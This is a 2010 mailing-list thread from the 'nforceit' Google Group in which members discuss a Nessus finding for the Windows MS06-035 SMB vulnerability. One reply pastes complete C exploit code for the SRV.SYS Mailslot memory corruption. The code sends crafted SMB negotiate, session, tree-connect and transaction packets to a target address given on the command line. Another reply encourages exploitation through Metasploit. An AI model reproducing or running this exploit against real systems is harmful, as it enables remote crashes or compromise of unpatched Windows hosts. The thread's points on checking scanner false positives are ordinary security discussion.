In same lines, there is another CRITICAL vulnerability in SMB which allows Remote Code Execution.
MS10-012: Vulnerabilities in SMB Could Allow Remote Code Execution Even if you are unable to trigger MS06-035, this has more chances of getting triggered. Cheers, 0xN41K On Fri, Jul 9, 2010 at 1:32 AM, Sandeep Thakur <[email protected]> wrote: > Exploit code for you. Try if for knowledge purpose. Do not harm anyone by > this... > > ----------start of code------------- > > #include <stdio.h> > #include <windows.h> > #include <winsock.h> > > /******************************************************************* > Microsoft SRV.SYS Mailslot Ring0 Memory Corruption(*MS06-035*) *Exploit* > > by cocoruder(frankruder_at_hotmail.com),2006.7.19 > page:http://ruder.cdut.net > *******************************************************************/ > > > unsigned char SmbNeg[] = > "\x00\x00\x00\x2f\xff\x53\x4d\x42\x72\x00" > "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" > "\x00\x00\x00\x00\x88\x05\x00\x00\x00\x00\x00\x0c\x00\x02\x4e\x54" > > "\x20\x4c\x4d\x20\x30\x2e\x31\x32\x00"; > > unsigned char Session_Setup_AndX_Request[]= > "\x00\x00\x00\x48\xff\x53\x4d\x42\x73\x00" > "\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" > > "\x00\x00\xff\xff\x88\x05\x00\x00\x00\x00\x0d\xff\x00\x00\x00\xff" > "\xff\x02\x00\x88\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" > "\x00\x01\x00\x00\x00\x0b\x00\x00\x00\x6e\x74\x00\x70\x79\x73\x6d" > > "\x62\x00"; > > unsigned char TreeConnect_AndX_Request[]= > "\x00\x00\x00\x58\xff\x53\x4d\x42\x75\x00" > "\x00\x00\x00\x18\x07\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" > "\x00\x00\x00\x00\xff\xfe\x00\x08\x00\x03\x04\xff\x00\x58\x00\x08" > > "\x00\x01\x00\x2d\x00\x00\x5c\x00\x5c\x00\x31\x00\x37\x00\x32\x00" > "\x2e\x00\x32\x00\x32\x00\x2e\x00\x35\x00\x2e\x00\x34\x00\x36\x00" > "\x5c\x00\x49\x00\x50\x00\x43\x00\x24\x00\x00\x00\x3f\x3f\x3f\x3f" > > "\x3f\x00"; > > unsigned char Trans_Request[]= > "\x00\x00\x00\x56\xff\x53\x4d\x42\x25\x00" > "\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" > "\x00\x00\x00\x08\x88\x05\x00\x08\x00\x00\x11\x00\x00\x01\x00\x00" > > "\x04\xe0\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x55" > "\x00\x01\x00\x55\x00\x03\x00\x01\x00\x00\x00\x00\x00\x11\x00\x5c" > "\x4d\x41\x49\x4c\x53\x4c\x4f\x54\x5c\x4c\x41\x4e\x4d\x41\x4e\x41"; > > > unsigned char recvbuff[2048]; > > > > > > void neg ( int s ) > { > char response[1024]; > > memset(response,0,sizeof(response)); > > send(s,(char *)SmbNeg,sizeof(SmbNeg)-1,0); > } > > void main(int argc,char **argv) > > { > struct sockaddr_in server; > SOCKET sock; > DWORD ret; > WSADATA ws; > > WORD userid,treeid; > > > WSAStartup(MAKEWORD(2,2),&ws); > > sock = socket(AF_INET,SOCK_STREAM,0); > if(sock<=0) > { > > return; > } > > server.sin_family = AF_INET; > server.sin_addr.s_addr = inet_addr(argv[1]); > server.sin_port = htons((USHORT)atoi(argv[2])); > > ret=connect(sock,(struct sockaddr *)&server,sizeof(server)); > > if (ret==-1) > { > printf("connect error!\n"); > return; > } > > neg(sock); > > recv(sock,(char *)recvbuff,sizeof(recvbuff),0); > > ret=send(sock,(char > *)Session_Setup_AndX_Request,sizeof(Session_Setup_AndX_Request)-1,0); > > if (ret<=0) > { > printf("send Session_Setup_AndX_Request error!\n"); > return; > } > recv(sock,(char *)recvbuff,sizeof(recvbuff),0); > > userid=*(WORD *)(recvbuff+0x20); //get userid > > > memcpy(TreeConnect_AndX_Request+0x20,(char *)&userid,2); //update userid > > > ret=send(sock,(char > *)TreeConnect_AndX_Request,sizeof(TreeConnect_AndX_Request)-1,0); > if (ret<=0) > { > printf("send TreeConnect_AndX_Request error!\n"); > return; > } > recv(sock,(char *)recvbuff,sizeof(recvbuff),0); > > treeid=*(WORD *)(recvbuff+0x1c); //get treeid > > memcpy(Trans_Request+0x20,(char *)&userid,2); //update userid > memcpy(Trans_Request+0x1c,(char *)&treeid,2); //update treeid > > ret=send(sock,(char *)Trans_Request,sizeof(Trans_Request)-1,0); > > if (ret<=0) > { > printf("send Trans_Request error!\n"); > return; > } > recv(sock,(char *)recvbuff,sizeof(recvbuff),0); > > } > > > > ---------end of code--------------- > > > Regards > Sandeep Thakur > > > > > On Thu, Jul 8, 2010 at 11:04 AM, Ravi Gopal <[email protected]> wrote: > >> Hi, >> >> Through Metasploit framework it is very easy to exploit this vulnerability >> MS06-035. >> You can get the shell (command prompt) of the remote system depending on >> the payload selected in Metasploit. >> >> Please note that similar to other tools, Nessus is not an exception in >> reporting false positives. So please confirm the vulnerability before >> reporting it to client. Windows XP service pack 2 is vulnerable but not >> service pack 3. So if somebody scans XP system with SP3 even then Nessus >> reports this vulnerability. >> >> I hope this helps. >> >> Happy exploitation. >> >> Regards, >> Ravi Gopal >> >> >> >> >> On Thu, Jul 8, 2010 at 4:28 PM, Sandeep Thakur <[email protected]>wrote: >> >>> It seems you have run Nessus on your Windows XP operating system. >>> However, Please refer to MS06-035: Vulnerability in Server Service Could >>> Allow Remote Code Execution (917159) (uncredentialed check) >>> >>> http://www.microsoft.com/technet/security/bulletin/ms06-035.mspx >>> >>> >>> Regards >>> Sandeep Thakur >>> On Thu, Jul 8, 2010 at 1:16 AM, Old Chick <[email protected]> wrote: >>> >>>> Hello Friends, >>>> >>>> Iam Trying to work on Nessus and i found the vulnerabitlity like >>>> this . >>>> >>>> can we disscuss on these >>>> Synopsis >>>> Arbitrary code can be executed on the remote host due to a flaw in the >>>> 'Server' service. >>>> >>>> Description >>>> The remote host is vulnerable to heap overflow in the 'Server' service >>>> that may allow an attacker to execute arbitrary code on the remote >>>> host with 'SYSTEM' privileges. >>>> >>>> In addition to this, the remote host is also affected by an >>>> information disclosure vulnerability in SMB that may allow an attacker >>>> to obtain portions of the memory of the remote host. >>>> >>>> Thank u >>>> Oldchic >>>> >>>> -- >>>> You received this message because you are subscribed to the Google >>>> Groups "nforceit" group. >>>> To post to this group, send an email to [email protected]. >>>> To unsubscribe from this group, send email to >>>> [email protected]<nforceit%[email protected]> >>>> . >>>> For more options, visit this group at >>>> http://groups.google.com/group/nforceit?hl=en-GB. >>>> >>>> >>> -- >>> You received this message because you are subscribed to the Google Groups >>> "nforceit" group. >>> To post to this group, send an email to [email protected]. >>> To unsubscribe from this group, send email to >>> [email protected]<nforceit%[email protected]> >>> . >>> For more options, visit this group at >>> http://groups.google.com/group/nforceit?hl=en-GB. >>> >> >> -- >> You received this message because you are subscribed to the Google >> Groups "nforceit" group. >> To post to this group, send an email to [email protected]. >> To unsubscribe from this group, send email to >> [email protected]<nforceit%[email protected]> >> . >> For more options, visit this group at >> http://groups.google.com/group/nforceit?hl=en-GB. >> > > -- > You received this message because you are subscribed to the Google Groups > "nforceit" group. > To post to this group, send an email to [email protected]. > To unsubscribe from this group, send email to > [email protected]<nforceit%[email protected]> > . > For more options, visit this group at > http://groups.google.com/group/nforceit?hl=en-GB. > -- You received this message because you are subscribed to the Google Groups "nforceit" group. To post to this group, send an email to [email protected]. To unsubscribe from this group, send email to [email protected]. For more options, visit this group at http://groups.google.com/group/nforceit?hl=en-GB.
